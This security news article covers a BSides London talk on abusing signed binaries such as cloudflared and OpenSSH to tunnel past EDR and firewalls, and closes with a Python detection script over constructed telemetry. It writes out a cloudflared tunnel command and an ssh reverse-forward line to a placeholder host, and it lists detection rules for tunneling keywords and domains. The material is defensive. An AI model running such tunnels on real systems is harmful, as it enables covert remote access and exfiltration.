A presentation at BSides London 2024 described an attack technique its author calls Bring Your Own Trusted Binary (BYOTB).
The method uses legitimate, trusted binaries to evade Endpoint Detection and Response (EDR) systems and to pass through firewall rules that would stop unknown tooling.
The findings, presented by cybersecurity researcher David Kennedy of Jumpsec Labs, show how attackers can repurpose trusted, signed tools for covert remote access.
Exploiting Trusted Tools for Malicious Purposes
The BYOTB technique capitalizes on the inherent trust placed in legitimate binaries, such as Cloudflare's cloudflared and OpenSSH utilities.
These binaries, often digitally signed and widely used for legitimate purposes, are repurposed by attackers to bypass security controls: a valid signature tells the EDR who built the binary, not who is running it or why.
![BYOTB Attack](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYm69j_pS7fk5QZCjUX0wW7BeaBS81Q6J9s1n4Xp9GVkh8mS8GHxk8KSJMQsJEYu16auz1ekZ3J1WXtnRJ_jHl86gSjfdM_ma1qhOjSqOTNx1-fYI7mAehU57WhKkR8kDaABqdMEDQZJCdXOS9Ar4WatJ4c51k5HRQjuLV1Y2ahmUTqLRw3S6qDnQVWIw/s16000/Windows%20Machine.webp)
For instance, Kennedy demonstrated how the cloudflared binary can be used to tunnel SSH traffic over HTTPS (port 443), bypassing network restrictions and, in the demonstration, going unflagged by CrowdStrike EDR.
By running a command such as cloudflared tunnel run --token YourTokenHere on the compromised host, an attacker establishes an outbound, encrypted tunnel to Cloudflare's edge that looks like ordinary HTTPS traffic; the token ties the host to a tunnel the attacker has already configured in their own Cloudflare account, so no inbound connection or listening port on the victim is needed.
These tunnels can then be used for reverse port forwarding or SOCKS proxying, enabling attackers to exfiltrate data or maintain persistent access to compromised systems.
OpenSSH binaries were also highlighted as a means to establish remote access, dropped on the host alongside their dependencies such as libcrypto.dll.
Advanced Techniques and OPSEC Considerations
Kennedy further elaborated on advanced techniques, including the use of Cloudflare's WARP client as an alternative to traditional SSH tunneling.
With WARP, the attacker's machine is enrolled in the same Cloudflare Zero Trust organization as the tunnel, so the connection behaves like a VPN into the target network and no SSH session or Proxychains wrapper is needed on the attacker side.
![BYOTB Attack](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbiHmJE3S0jDfzjvGK7DfyRvYTs__XhP9cqp372g4jSftbYZ6c-lzuxluXLw23j2nTs8nN0pA2Dmf-BUJ3n6kVEO_4quxWLv4XN1Bome_q_LxS7B-bq6tVC00UY4AYfDvHqYLI9NG6HKLqDGwPjHNjLU5R00QVJcAZsUeDrj7BkvoOGGpJfOEbsFdwZ8/s16000/Proxychains%20connection.webp)
Additionally, a “double tunnel” method was described, where attackers reroute traffic through multiple layers of tunnels to evade firewall rules that block specific ports.
Despite the effectiveness of these methods, Kennedy emphasized that operational security (OPSEC) still matters for the attacker.
According to Jumpsec Labs, pushing excessive traffic through a trusted binary, or failing to conceal its presence on disk and in process listings, can trigger alerts and compromise the attack.
To mitigate the risks posed by BYOTB attacks, organizations must adopt proactive monitoring and detection strategies:
- Process Telemetry: Monitor command-line arguments for suspicious keywords like "tunnel" or "access," which may indicate misuse of binaries like cloudflared; an ssh client launched with -R (reverse forward) or -D (SOCKS proxy) from a user-writable directory deserves the same scrutiny.
- DNS Logging: Track queries to domains associated with tunneling tools (e.g., argotunnel.com, which cloudflared contacts to reach Cloudflare's edge) to identify potential abuse.
- Firewall Rules: Restrict outbound traffic on non-essential ports and monitor for anomalies in port usage. Blocking unusual ports alone is not enough: cloudflared defaults to QUIC on UDP/7844 and falls back to HTTP/2 over TCP/443 when that is blocked, so an ordinary outbound-HTTPS allowance is all the tunnel needs.
- File Monitoring: Detect unauthorized downloads of trusted binaries from platforms like GitHub by verifying file hashes against approved lists, and treat a signed cloudflared or ssh.exe appearing in a Downloads or temp folder as suspicious even though the signature is valid.
These measures, combined with regular updates to endpoint security solutions and employee awareness training, can help organizations defend against BYOTB tactics.
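As an added illustration (example code written for this article, not Jumpsec's or Cloudflare's), the following Python runs the four controls above as simple rules over a handful of constructed events. The sample events, the "approved" hashes, the expected install directories and the host names are all assumptions made up for the example; the WS01 entries mirror the cloudflared and OpenSSH usage described earlier in the article, so the block also serves as a concrete picture of what that activity looks like in process, DNS and file telemetry.

```python
"""Toy BYOTB detection pass over constructed endpoint telemetry.

Each rule maps onto one of the controls listed above: process command
lines, DNS queries to tunnel-broker domains, and file hashes of trusted
binaries that turn up where they should not.
"""
import hashlib
import ntpath
from dataclasses import dataclass

# Placeholder "approved build" digests (hypothetical, NOT real cloudflared or
# OpenSSH release hashes). In practice populate from vendor checksums or inventory.
APPROVED_CLOUDFLARED_SHA256 = hashlib.sha256(b"approved cloudflared build (placeholder)").hexdigest()
APPROVED_SSH_SHA256 = hashlib.sha256(b"approved OpenSSH build (placeholder)").hexdigest()
APPROVED_HASHES = {
    "cloudflared.exe": {APPROVED_CLOUDFLARED_SHA256},
    "ssh.exe": {APPROVED_SSH_SHA256},
}
# Directories where these binaries are expected to live (assumed for this example).
APPROVED_DIRS = (
    r"c:\program files\cloudflared",
    r"c:\program files (x86)\cloudflared",
    r"c:\windows\system32\openssh",
)
# cloudflared reaches Cloudflare's edge via *.argotunnel.com.
TUNNEL_DOMAIN_SUFFIXES = (".argotunnel.com",)
# Sub-commands that mean "tunnel", as opposed to e.g. "--version".
CLOUDFLARED_TUNNEL_WORDS = {"tunnel", "access"}
SSH_FORWARD_FLAGS = {"-R", "-D"}  # reverse port forward, SOCKS proxy


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process(ev: dict) -> list[Alert]:
    """Process-creation event: tunnel-style arguments and unexpected image location."""
    alerts = []
    name = _basename(ev["image"])
    tokens = ev["cmdline"].split()  # simplification: combined flags such as -NR are not split
    if name in ("cloudflared.exe", "cloudflared") and CLOUDFLARED_TUNNEL_WORDS & {t.lower() for t in tokens}:
        alerts.append(Alert("cloudflared_tunnel_cmdline", ev["host"], ev["cmdline"]))
    if name in ("ssh.exe", "ssh") and SSH_FORWARD_FLAGS & set(tokens):
        alerts.append(Alert("ssh_port_forward_cmdline", ev["host"], ev["cmdline"]))
    if name in APPROVED_HASHES and not ev["image"].lower().startswith(APPROVED_DIRS):
        alerts.append(Alert("trusted_binary_unexpected_path", ev["host"], ev["image"]))
    return alerts


def check_dns(ev: dict) -> list[Alert]:
    """DNS-query event: lookups of tunnel-broker domains."""
    q = ev["query"].lower().rstrip(".")
    if q.endswith(TUNNEL_DOMAIN_SUFFIXES) or q in {s.lstrip(".") for s in TUNNEL_DOMAIN_SUFFIXES}:
        return [Alert("tunnel_domain_dns_query", ev["host"], q)]
    return []


def check_file(ev: dict) -> list[Alert]:
    """File-creation event: a trusted binary whose hash is not on the approved list."""
    name = _basename(ev["path"])
    if name in APPROVED_HASHES and ev["sha256"] not in APPROVED_HASHES[name]:
        return [Alert("unapproved_trusted_binary_hash", ev["host"], f"{ev['path']} sha256={ev['sha256'][:12]}...")]
    return []


CHECKS = {"process": check_process, "dns": check_dns, "file": check_file}


def analyze(events: list[dict]) -> list[Alert]:
    """Run every event through the check for its type and collect the alerts."""
    alerts = []
    for ev in events:
        alerts.extend(CHECKS[ev["type"]](ev))
    return alerts


# Constructed sample events (not real telemetry); fields loosely follow Sysmon
# process-create, DNS-query and file-create records. The WS01 entries mirror the
# attack chain described above; WS02 is a legitimate install for contrast.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "image": r"C:\Users\jdoe\Downloads\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token <redacted-tunnel-token>"},
    {"type": "process", "host": "WS01", "image": r"C:\Users\jdoe\Downloads\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 -o StrictHostKeyChecking=no jdoe@tunnel.example"},
    {"type": "process", "host": "WS02", "image": r"C:\Program Files (x86)\cloudflared\cloudflared.exe",
     "cmdline": "cloudflared.exe --version"},
    {"type": "dns", "host": "WS01", "query": "region1.v2.argotunnel.com"},
    {"type": "dns", "host": "WS02", "query": "update.microsoft.com"},
    {"type": "file", "host": "WS01", "path": r"C:\Users\jdoe\Downloads\cloudflared.exe",
     "sha256": hashlib.sha256(b"unapproved download (placeholder)").hexdigest()},
    {"type": "file", "host": "WS02", "path": r"C:\Program Files (x86)\cloudflared\cloudflared.exe",
     "sha256": APPROVED_CLOUDFLARED_SHA256},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

Run stand-alone it prints six alerts, all for WS01, and nothing for the legitimately installed copy on WS02. The point of the path and hash rules is that the binary being signed is irrelevant to them: the same cloudflared.exe is approved in Program Files and flagged in Downloads, which is exactly the distinction a signature-trusting EDR does not draw on its own.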
The rise of BYOTB attacks underscores how threat actors exploit trusted tools for malicious purposes.
By leveraging legitimate binaries, attackers blend into normal network activity, making detection significantly more challenging: the binary is signed, the traffic is TLS to a reputable CDN, and the destination port is one every outbound proxy already allows.
Organizations should therefore shift detection from "is this binary known-bad" to "is this known-good binary being used in a way, and from a place, that we expect", and remain vigilant as such techniques spread.